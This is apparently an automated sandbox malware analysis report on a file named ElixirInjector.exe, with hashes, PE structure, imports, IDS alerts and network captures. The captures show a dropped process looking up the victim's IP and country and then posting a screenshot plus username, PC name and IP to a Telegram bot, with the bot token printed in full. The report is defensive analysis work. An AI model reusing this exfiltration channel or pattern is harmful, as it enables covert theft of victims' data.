SHA1:	979C02265019C77ADA5578B1CFC1A98A65F5F095
SHA-256:	2A01AA8E358B9A949A198CA22EA8FA189990D3004467E600136142D7D97E3D08
SHA-512:	C7CEAE4B46C186C8F36ACA7B6334E116BD42E9A164CCF382F4F29298CAC4790BA1BEA7E90DDB738A6DE925890202BFE65D606A83C9C13665701CA9C712DC915A
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 58%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....f.................$ ..........B .. ...` ...@.. ........................ ...........@..................................B .K....` . ..................... ...................................................... ............... ..H............text...." .. ...$ ................. ..`.rsrc... ....` ......& .............@....reloc........ ......* .............@..B.................B .....H.......T...................S...B ......................................0..........(.... ........8........E...............N...8....(.... ....~....{....9....& ....8....(.... ....~....{....9....& ....8....(.... ........8........0..Q....... ........8........E....)...........r.......M.......8$...8.... ....~....{}...:....& ....8....8.... ....~....{o...9....& ....8.......... ....~....{k...:x...& ....8m...~....(_... .... .... ....s....~....(c....... ....~....{p...:-...& ....8"...

\Device\Null

Download File

Process:	C:\Windows\System32\PING.EXE
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	502
Entropy (8bit):	4.626625764922207
Encrypted:	false
SSDEEP:
MD5:	F0EAEA542079990977F609030765551E
SHA1:	3C3394CBC24F7FBB5B1E59615722A29494B47D98
SHA-256:	F6A5F7729AD59B9301ADD7210115FB260E2D678A6EC6C2B00FB7D0332CB174B8
SHA-512:	D1F04687D75E043172CBBB30AA8C87FDC6A9032BA18BF4BA884F794307F0E0FFBD4C514A7D1522E7CC0608C2910D71FE0977E9AADC391E1C22BE3CF0FD89D2EF
Malicious:	false
Preview:	..Pinging 899552 [::1] with 32 bytes of data:..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ....Ping statistics for ::1:.. Packets: Sent = 10, Received = 10, Lost = 0 (0% loss),..Approximate round trip times in milli-seconds:.. Minimum = 0ms, Maximum = 0ms, Average = 0ms..

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.932041672489681
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	ElixirInjector.exe
File size:	1'968'011 bytes
MD5:	04095b54d4245dca4aeb05310a2ddc8a
SHA1:	4d5bc54fade2e8af35d36ae0cab2c0f835cb7334
SHA256:	7014e9a725d8449f588d906d671771ccbf2c253d603205818a5af782a02e320c
SHA512:	f666c5f973a67aeb3d56b2055884267f2fd892634c2267dbd0e29965285dc05d876658fa944100bafe572b66061a8a7caefd3b1e650ee9302ae229255a8a854f
SSDEEP:	49152:OB8cSz7LU1B6RIML97yovHGfx8UINTPWUznpd:QEvKB6WMBvqnIJx
TLSH:	AF9523027CC585B2C1A21D372B3AEA11693CBD705F69DEDB7384199ECA305D0EB35B62
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......x_c.<>..<>..<>......1>.......>......$>...I..>>...I../>...I..+>...I...>..5F..7>..5F..;>..<>..)?...I...>...I..=>...I..=>...I..=>.

File Icon


Icon Hash:	072d8d4ccdcf4f13

Static PE Info

General

Entrypoint:	0x41f530
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
Time Stamp:	0x6220BF8D [Thu Mar 3 13:15:57 2022 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	1
File Version Major:	5
File Version Minor:	1
Subsystem Version Major:	5
Subsystem Version Minor:	1
Import Hash:	12e12319f1029ec4f8fcbed7e82df162

Entrypoint Preview

Instruction
call 00007F0578B73C3Bh
jmp 00007F0578B7354Dh
int3
int3
int3
int3
int3
int3
push ebp
mov ebp, esp
push esi
push dword ptr [ebp+08h]
mov esi, ecx
call 00007F0578B66397h
mov dword ptr [esi], 004356D0h
mov eax, esi
pop esi
pop ebp
retn 0004h
and dword ptr [ecx+04h], 00000000h
mov eax, ecx
and dword ptr [ecx+08h], 00000000h
mov dword ptr [ecx+04h], 004356D8h
mov dword ptr [ecx], 004356D0h
ret
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
push ebp
mov ebp, esp
push esi
mov esi, ecx
lea eax, dword ptr [esi+04h]
mov dword ptr [esi], 004356B8h
push eax
call 00007F0578B769DFh
test byte ptr [ebp+08h], 00000001h
pop ecx
je 00007F0578B736DCh
push 0000000Ch
push esi
call 00007F0578B72C99h
pop ecx
pop ecx
mov eax, esi
pop esi
pop ebp
retn 0004h
push ebp
mov ebp, esp
sub esp, 0Ch
lea ecx, dword ptr [ebp-0Ch]
call 00007F0578B66312h
push 0043BEF0h
lea eax, dword ptr [ebp-0Ch]
push eax
call 00007F0578B76499h
int3
push ebp
mov ebp, esp
sub esp, 0Ch
lea ecx, dword ptr [ebp-0Ch]
call 00007F0578B73658h
push 0043C0F4h
lea eax, dword ptr [ebp-0Ch]
push eax
call 00007F0578B7647Ch
int3
jmp 00007F0578B77F17h
int3
int3
int3
int3
push 00422900h
push dword ptr fs:[00000000h]

Rich Headers

Programming Language:

[ C ] VS2008 SP1 build 30729
[IMP] VS2008 SP1 build 30729

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x3d070	0x34	.rdata
IMAGE_DIRECTORY_ENTRY_IMPORT	0x3d0a4	0x50	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x64000	0xc3e8	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x71000	0x233c	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x3b11c	0x54	.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x355f8	0x40	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x33000	0x278	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x3c5ec	0x120	.rdata
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x31bdc	0x31c00	2831bb8b11e3209658a53131886cdf98	False	0.5909380888819096	data	6.712962136932442	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x33000	0xaec0	0xb000	042f11346230ca5aa360727d9908e809	False	0.4579190340909091	data	5.261605615899847	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x3e000	0x24720	0x1000	9670b581969e508258d8bc903025de5e	False	0.451416015625	data	4.387459135575936	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.didat	0x63000	0x190	0x200	c83554035c63bb446c6208d0c8fa0256	False	0.4453125	data	3.3327310103022305	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x64000	0xc3e8	0xc400	bec94f1f3e278205a2e4f4feda712824	False	0.8596739477040817	data	7.575023821279637	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x71000	0x233c	0x2400	40b5e17755fd6fdd34de06e5cdb7f711	False	0.7749565972222222	data	6.623012966548067	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
PNG	0x64524	0xb45	PNG image data, 93 x 302, 8-bit/color RGB, non-interlaced	English	United States	1.0027729636048528
PNG	0x6506c	0x15a9	PNG image data, 186 x 604, 8-bit/color RGB, non-interlaced	English	United States	0.9363390441839495
RT_ICON	0x66618	0x7a81	PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced			0.9990433978508338
RT_DIALOG	0x6e09c	0x286	data	English	United States	0.5092879256965944
RT_DIALOG	0x6e324	0x13a	data	English	United States	0.60828025477707
RT_DIALOG	0x6e460	0xec	data	English	United States	0.6991525423728814
RT_DIALOG	0x6e54c	0x12e	data	English	United States	0.5927152317880795
RT_DIALOG	0x6e67c	0x338	data	English	United States	0.45145631067961167
RT_DIALOG	0x6e9b4	0x252	data	English	United States	0.5757575757575758
RT_STRING	0x6ec08	0x1e2	data	English	United States	0.3900414937759336
RT_STRING	0x6edec	0x1cc	data	English	United States	0.4282608695652174
RT_STRING	0x6efb8	0x1b8	data	English	United States	0.45681818181818185
RT_STRING	0x6f170	0x146	data	English	United States	0.5153374233128835
RT_STRING	0x6f2b8	0x46c	data	English	United States	0.3454063604240283
RT_STRING	0x6f724	0x166	data	English	United States	0.49162011173184356
RT_STRING	0x6f88c	0x152	data	English	United States	0.5059171597633136
RT_STRING	0x6f9e0	0x10a	data	English	United States	0.49624060150375937
RT_STRING	0x6faec	0xbc	data	English	United States	0.6329787234042553
RT_STRING	0x6fba8	0xd6	data	English	United States	0.5747663551401869
RT_GROUP_ICON	0x6fc80	0x14	data			1.05
RT_MANIFEST	0x6fc94	0x753	XML 1.0 document, ASCII text, with CRLF line terminators	English	United States	0.3957333333333333

Imports

DLL	Import
KERNEL32.dll	GetLastError, SetLastError, FormatMessageW, GetCurrentProcess, DeviceIoControl, SetFileTime, CloseHandle, CreateDirectoryW, RemoveDirectoryW, CreateFileW, DeleteFileW, CreateHardLinkW, GetShortPathNameW, GetLongPathNameW, MoveFileW, GetFileType, GetStdHandle, WriteFile, ReadFile, FlushFileBuffers, SetEndOfFile, SetFilePointer, SetFileAttributesW, GetFileAttributesW, FindClose, FindFirstFileW, FindNextFileW, InterlockedDecrement, GetVersionExW, GetCurrentDirectoryW, GetFullPathNameW, FoldStringW, GetModuleFileNameW, GetModuleHandleW, FindResourceW, FreeLibrary, GetProcAddress, GetCurrentProcessId, ExitProcess, SetThreadExecutionState, Sleep, LoadLibraryW, GetSystemDirectoryW, CompareStringW, AllocConsole, FreeConsole, AttachConsole, WriteConsoleW, GetProcessAffinityMask, CreateThread, SetThreadPriority, InitializeCriticalSection, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, SetEvent, ResetEvent, ReleaseSemaphore, WaitForSingleObject, CreateEventW, CreateSemaphoreW, GetSystemTime, SystemTimeToTzSpecificLocalTime, TzSpecificLocalTimeToSystemTime, SystemTimeToFileTime, FileTimeToLocalFileTime, LocalFileTimeToFileTime, FileTimeToSystemTime, GetCPInfo, IsDBCSLeadByte, MultiByteToWideChar, WideCharToMultiByte, GlobalAlloc, LockResource, GlobalLock, GlobalUnlock, GlobalFree, LoadResource, SizeofResource, SetCurrentDirectoryW, GetExitCodeProcess, GetLocalTime, GetTickCount, MapViewOfFile, UnmapViewOfFile, CreateFileMappingW, OpenFileMappingW, GetCommandLineW, SetEnvironmentVariableW, ExpandEnvironmentStringsW, GetTempPathW, MoveFileExW, GetLocaleInfoW, GetTimeFormatW, GetDateFormatW, GetNumberFormatW, DecodePointer, SetFilePointerEx, GetConsoleMode, GetConsoleCP, HeapSize, SetStdHandle, GetProcessHeap, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetCommandLineA, GetOEMCP, RaiseException, GetSystemInfo, VirtualProtect, VirtualQuery, LoadLibraryExA, IsProcessorFeaturePresent, IsDebuggerPresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetStartupInfoW, QueryPerformanceCounter, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, TerminateProcess, LocalFree, RtlUnwind, EncodePointer, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, LoadLibraryExW, QueryPerformanceFrequency, GetModuleHandleExW, GetModuleFileNameA, GetACP, HeapFree, HeapAlloc, HeapReAlloc, GetStringTypeW, LCMapStringW, FindFirstFileExA, FindNextFileA, IsValidCodePage
OLEAUT32.dll	SysAllocString, SysFreeString, VariantClear
gdiplus.dll	GdipAlloc, GdipDisposeImage, GdipCloneImage, GdipCreateBitmapFromStream, GdipCreateBitmapFromStreamICM, GdipCreateHBITMAPFromBitmap, GdiplusStartup, GdiplusShutdown, GdipFree

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2025-01-13T13:20:31.267087+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.6	49847	34.117.59.81	443	TCP
2025-01-13T13:20:32.313688+0100	1810009	Joe Security ANOMALY Telegram Send Photo	1	192.168.2.6	49852	149.154.167.220	443	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 13, 2025 13:20:29.843364000 CET	49843	443	192.168.2.6	34.117.59.81
Jan 13, 2025 13:20:29.843419075 CET	443	49843	34.117.59.81	192.168.2.6
Jan 13, 2025 13:20:29.844027042 CET	49843	443	192.168.2.6	34.117.59.81
Jan 13, 2025 13:20:29.858511925 CET	49843	443	192.168.2.6	34.117.59.81
Jan 13, 2025 13:20:29.858552933 CET	443	49843	34.117.59.81	192.168.2.6
Jan 13, 2025 13:20:30.321268082 CET	443	49843	34.117.59.81	192.168.2.6
Jan 13, 2025 13:20:30.321341038 CET	49843	443	192.168.2.6	34.117.59.81
Jan 13, 2025 13:20:30.326309919 CET	49843	443	192.168.2.6	34.117.59.81
Jan 13, 2025 13:20:30.326323032 CET	443	49843	34.117.59.81	192.168.2.6
Jan 13, 2025 13:20:30.326683044 CET	443	49843	34.117.59.81	192.168.2.6
Jan 13, 2025 13:20:30.375999928 CET	49843	443	192.168.2.6	34.117.59.81
Jan 13, 2025 13:20:30.413794041 CET	49843	443	192.168.2.6	34.117.59.81
Jan 13, 2025 13:20:30.455329895 CET	443	49843	34.117.59.81	192.168.2.6
Jan 13, 2025 13:20:30.535365105 CET	443	49843	34.117.59.81	192.168.2.6
Jan 13, 2025 13:20:30.535450935 CET	443	49843	34.117.59.81	192.168.2.6
Jan 13, 2025 13:20:30.535504103 CET	49843	443	192.168.2.6	34.117.59.81
Jan 13, 2025 13:20:30.660085917 CET	49843	443	192.168.2.6	34.117.59.81
Jan 13, 2025 13:20:30.669480085 CET	49847	443	192.168.2.6	34.117.59.81
Jan 13, 2025 13:20:30.669529915 CET	443	49847	34.117.59.81	192.168.2.6
Jan 13, 2025 13:20:30.669591904 CET	49847	443	192.168.2.6	34.117.59.81
Jan 13, 2025 13:20:30.669809103 CET	49847	443	192.168.2.6	34.117.59.81
Jan 13, 2025 13:20:30.669822931 CET	443	49847	34.117.59.81	192.168.2.6
Jan 13, 2025 13:20:31.132097006 CET	443	49847	34.117.59.81	192.168.2.6
Jan 13, 2025 13:20:31.133987904 CET	49847	443	192.168.2.6	34.117.59.81
Jan 13, 2025 13:20:31.134012938 CET	443	49847	34.117.59.81	192.168.2.6
Jan 13, 2025 13:20:31.267127037 CET	443	49847	34.117.59.81	192.168.2.6
Jan 13, 2025 13:20:31.267190933 CET	443	49847	34.117.59.81	192.168.2.6
Jan 13, 2025 13:20:31.267345905 CET	49847	443	192.168.2.6	34.117.59.81
Jan 13, 2025 13:20:31.267658949 CET	49847	443	192.168.2.6	34.117.59.81
Jan 13, 2025 13:20:31.377116919 CET	49852	443	192.168.2.6	149.154.167.220
Jan 13, 2025 13:20:31.377216101 CET	443	49852	149.154.167.220	192.168.2.6
Jan 13, 2025 13:20:31.377302885 CET	49852	443	192.168.2.6	149.154.167.220
Jan 13, 2025 13:20:31.378884077 CET	49852	443	192.168.2.6	149.154.167.220
Jan 13, 2025 13:20:31.378925085 CET	443	49852	149.154.167.220	192.168.2.6
Jan 13, 2025 13:20:32.015774012 CET	443	49852	149.154.167.220	192.168.2.6
Jan 13, 2025 13:20:32.015861034 CET	49852	443	192.168.2.6	149.154.167.220
Jan 13, 2025 13:20:32.025147915 CET	49852	443	192.168.2.6	149.154.167.220
Jan 13, 2025 13:20:32.025193930 CET	443	49852	149.154.167.220	192.168.2.6
Jan 13, 2025 13:20:32.025543928 CET	443	49852	149.154.167.220	192.168.2.6
Jan 13, 2025 13:20:32.026962042 CET	49852	443	192.168.2.6	149.154.167.220
Jan 13, 2025 13:20:32.067343950 CET	443	49852	149.154.167.220	192.168.2.6
Jan 13, 2025 13:20:32.313721895 CET	443	49852	149.154.167.220	192.168.2.6
Jan 13, 2025 13:20:32.360393047 CET	49852	443	192.168.2.6	149.154.167.220
Jan 13, 2025 13:20:32.373320103 CET	49852	443	192.168.2.6	149.154.167.220
Jan 13, 2025 13:20:32.373366117 CET	443	49852	149.154.167.220	192.168.2.6
Jan 13, 2025 13:20:32.378698111 CET	49852	443	192.168.2.6	149.154.167.220
Jan 13, 2025 13:20:32.378710032 CET	443	49852	149.154.167.220	192.168.2.6
Jan 13, 2025 13:20:32.378797054 CET	49852	443	192.168.2.6	149.154.167.220
Jan 13, 2025 13:20:32.378804922 CET	443	49852	149.154.167.220	192.168.2.6
Jan 13, 2025 13:20:32.378954887 CET	49852	443	192.168.2.6	149.154.167.220
Jan 13, 2025 13:20:32.378968954 CET	443	49852	149.154.167.220	192.168.2.6
Jan 13, 2025 13:20:32.379009008 CET	49852	443	192.168.2.6	149.154.167.220
Jan 13, 2025 13:20:32.379014969 CET	443	49852	149.154.167.220	192.168.2.6
Jan 13, 2025 13:20:32.379051924 CET	49852	443	192.168.2.6	149.154.167.220
Jan 13, 2025 13:20:32.379056931 CET	443	49852	149.154.167.220	192.168.2.6
Jan 13, 2025 13:20:32.386323929 CET	49852	443	192.168.2.6	149.154.167.220
Jan 13, 2025 13:20:32.386338949 CET	443	49852	149.154.167.220	192.168.2.6
Jan 13, 2025 13:20:32.387284040 CET	49852	443	192.168.2.6	149.154.167.220
Jan 13, 2025 13:20:32.387295008 CET	443	49852	149.154.167.220	192.168.2.6
Jan 13, 2025 13:20:32.387741089 CET	49852	443	192.168.2.6	149.154.167.220
Jan 13, 2025 13:20:32.387749910 CET	443	49852	149.154.167.220	192.168.2.6
Jan 13, 2025 13:20:32.387784004 CET	49852	443	192.168.2.6	149.154.167.220
Jan 13, 2025 13:20:32.387795925 CET	443	49852	149.154.167.220	192.168.2.6
Jan 13, 2025 13:20:32.387825966 CET	49852	443	192.168.2.6	149.154.167.220
Jan 13, 2025 13:20:32.387835026 CET	443	49852	149.154.167.220	192.168.2.6
Jan 13, 2025 13:20:32.387866020 CET	49852	443	192.168.2.6	149.154.167.220
Jan 13, 2025 13:20:32.387876034 CET	443	49852	149.154.167.220	192.168.2.6
Jan 13, 2025 13:20:32.387903929 CET	49852	443	192.168.2.6	149.154.167.220
Jan 13, 2025 13:20:32.387912989 CET	443	49852	149.154.167.220	192.168.2.6
Jan 13, 2025 13:20:32.387949944 CET	49852	443	192.168.2.6	149.154.167.220
Jan 13, 2025 13:20:32.387986898 CET	49852	443	192.168.2.6	149.154.167.220
Jan 13, 2025 13:20:32.388020992 CET	49852	443	192.168.2.6	149.154.167.220
Jan 13, 2025 13:20:32.388042927 CET	49852	443	192.168.2.6	149.154.167.220
Jan 13, 2025 13:20:32.388070107 CET	49852	443	192.168.2.6	149.154.167.220
Jan 13, 2025 13:20:32.388098955 CET	49852	443	192.168.2.6	149.154.167.220
Jan 13, 2025 13:20:32.388129950 CET	49852	443	192.168.2.6	149.154.167.220
Jan 13, 2025 13:20:32.388151884 CET	49852	443	192.168.2.6	149.154.167.220
Jan 13, 2025 13:20:32.388190985 CET	49852	443	192.168.2.6	149.154.167.220
Jan 13, 2025 13:20:32.388221979 CET	49852	443	192.168.2.6	149.154.167.220
Jan 13, 2025 13:20:32.388250113 CET	49852	443	192.168.2.6	149.154.167.220
Jan 13, 2025 13:20:32.388356924 CET	443	49852	149.154.167.220	192.168.2.6
Jan 13, 2025 13:20:32.389437914 CET	49852	443	192.168.2.6	149.154.167.220
Jan 13, 2025 13:20:32.389451981 CET	443	49852	149.154.167.220	192.168.2.6
Jan 13, 2025 13:20:34.044469118 CET	443	49852	149.154.167.220	192.168.2.6
Jan 13, 2025 13:20:34.044548988 CET	49852	443	192.168.2.6	149.154.167.220
Jan 13, 2025 13:20:34.044569016 CET	443	49852	149.154.167.220	192.168.2.6
Jan 13, 2025 13:20:34.044615984 CET	49852	443	192.168.2.6	149.154.167.220
Jan 13, 2025 13:20:34.045314074 CET	49852	443	192.168.2.6	149.154.167.220

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 13, 2025 13:20:29.831152916 CET	51880	53	192.168.2.6	1.1.1.1
Jan 13, 2025 13:20:29.838737965 CET	53	51880	1.1.1.1	192.168.2.6
Jan 13, 2025 13:20:31.367119074 CET	62978	53	192.168.2.6	1.1.1.1
Jan 13, 2025 13:20:31.373712063 CET	53	62978	1.1.1.1	192.168.2.6

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Jan 13, 2025 13:20:29.831152916 CET	192.168.2.6	1.1.1.1	0x87f4	Standard query (0)	ipinfo.io	A (IP address)	IN (0x0001)	false
Jan 13, 2025 13:20:31.367119074 CET	192.168.2.6	1.1.1.1	0x6a63	Standard query (0)	api.telegram.org	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Jan 13, 2025 13:20:29.838737965 CET	1.1.1.1	192.168.2.6	0x87f4	No error (0)	ipinfo.io		34.117.59.81	A (IP address)	IN (0x0001)	false
Jan 13, 2025 13:20:31.373712063 CET	1.1.1.1	192.168.2.6	0x6a63	No error (0)	api.telegram.org		149.154.167.220	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

ipinfo.io

api.telegram.org

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.6	49843	34.117.59.81	443	3576	C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-13 12:20:30 UTC	61	OUT	GET /ip HTTP/1.1 Host: ipinfo.io Connection: Keep-Alive
2025-01-13 12:20:30 UTC	305	IN	HTTP/1.1 200 OK date: Mon, 13 Jan 2025 12:20:30 GMT content-type: text/plain; charset=utf-8 Content-Length: 12 access-control-allow-origin: * via: 1.1 google strict-transport-security: max-age=2592000; includeSubDomains Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close
2025-01-13 12:20:30 UTC	12	IN	Data Raw: 38 2e 34 36 2e 31 32 33 2e 31 38 39 Data Ascii: 8.46.123.189

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.6	49847	34.117.59.81	443	3576	C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-13 12:20:31 UTC	42	OUT	GET /country HTTP/1.1 Host: ipinfo.io
2025-01-13 12:20:31 UTC	448	IN	HTTP/1.1 200 OK access-control-allow-origin: * Content-Length: 3 content-type: text/html; charset=utf-8 date: Mon, 13 Jan 2025 12:20:31 GMT referrer-policy: strict-origin-when-cross-origin x-content-type-options: nosniff x-frame-options: SAMEORIGIN x-xss-protection: 1; mode=block via: 1.1 google strict-transport-security: max-age=2592000; includeSubDomains Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close
2025-01-13 12:20:31 UTC	3	IN	Data Raw: 55 53 0a Data Ascii: US

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.6	49852	149.154.167.220	443	3576	C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-13 12:20:32 UTC	255	OUT	POST /bot7622199935:AAFHSUQ61526mhYJcmipjqz2DM9Zso04aBI/sendPhoto HTTP/1.1 Content-Type: multipart/form-data; boundary="2fc83503-aa7d-4956-907f-539a12425ce1" Host: api.telegram.org Content-Length: 86494 Expect: 100-continue Connection: Keep-Alive
2025-01-13 12:20:32 UTC	25	IN	HTTP/1.1 100 Continue
2025-01-13 12:20:32 UTC	40	OUT	Data Raw: 2d 2d 32 66 63 38 33 35 30 33 2d 61 61 37 64 2d 34 39 35 36 2d 39 30 37 66 2d 35 33 39 61 31 32 34 32 35 63 65 31 0d 0a Data Ascii: --2fc83503-aa7d-4956-907f-539a12425ce1
2025-01-13 12:20:32 UTC	89	OUT	Data Raw: 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 70 6c 61 69 6e 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 63 68 61 74 5f 69 64 0d 0a 0d 0a Data Ascii: Content-Type: text/plain; charset=utf-8Content-Disposition: form-data; name=chat_id
2025-01-13 12:20:32 UTC	10	OUT	Data Raw: 36 32 37 35 37 34 39 33 39 33 Data Ascii: 6275749393
2025-01-13 12:20:32 UTC	131	OUT	Data Raw: 0d 0a 2d 2d 32 66 63 38 33 35 30 33 2d 61 61 37 64 2d 34 39 35 36 2d 39 30 37 66 2d 35 33 39 61 31 32 34 32 35 63 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 70 6c 61 69 6e 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 63 61 70 74 69 6f 6e 0d 0a 0d 0a Data Ascii: --2fc83503-aa7d-4956-907f-539a12425ce1Content-Type: text/plain; charset=utf-8Content-Disposition: form-data; name=caption
2025-01-13 12:20:32 UTC	135	OUT	Data Raw: 68 65 6c 6c 6f 0a 49 44 3a 20 61 30 66 63 63 62 39 65 38 38 35 31 30 66 39 34 63 62 30 64 65 66 66 64 33 63 36 32 31 32 37 30 35 32 62 32 61 66 65 33 0a 43 6f 6d 6d 65 6e 74 3a 20 65 6c 69 78 69 72 72 72 72 72 72 72 72 72 0a 55 73 65 72 6e 61 6d 65 3a 20 65 6e 67 69 6e 65 65 72 0a 50 43 20 4e 61 6d 65 3a 20 38 39 39 35 35 32 0a 49 50 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0a 47 45 4f 3a 20 55 53 0a Data Ascii: helloID: a0fccb9e88510f94cb0deffd3c62127052b2afe3Comment: elixirrrrrrrrrUsername: userPC Name: 899552IP: 8.46.123.189GEO: US
2025-01-13 12:20:32 UTC	146	OUT	Data Raw: 0d 0a 2d 2d 32 66 63 38 33 35 30 33 2d 61 61 37 64 2d 34 39 35 36 2d 39 30 37 66 2d 35 33 39 61 31 32 34 32 35 63 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 70 68 6f 74 6f 3b 20 66 69 6c 65 6e 61 6d 65 3d 73 63 72 65 65 6e 73 68 6f 74 2e 70 6e 67 3b 20 66 69 6c 65 6e 61 6d 65 2a 3d 75 74 66 2d 38 27 27 73 63 72 65 65 6e 73 68 6f 74 2e 70 6e 67 0d 0a 0d 0a Data Ascii: --2fc83503-aa7d-4956-907f-539a12425ce1Content-Disposition: form-data; name=photo; filename=screenshot.png; filename*=utf-8''screenshot.png
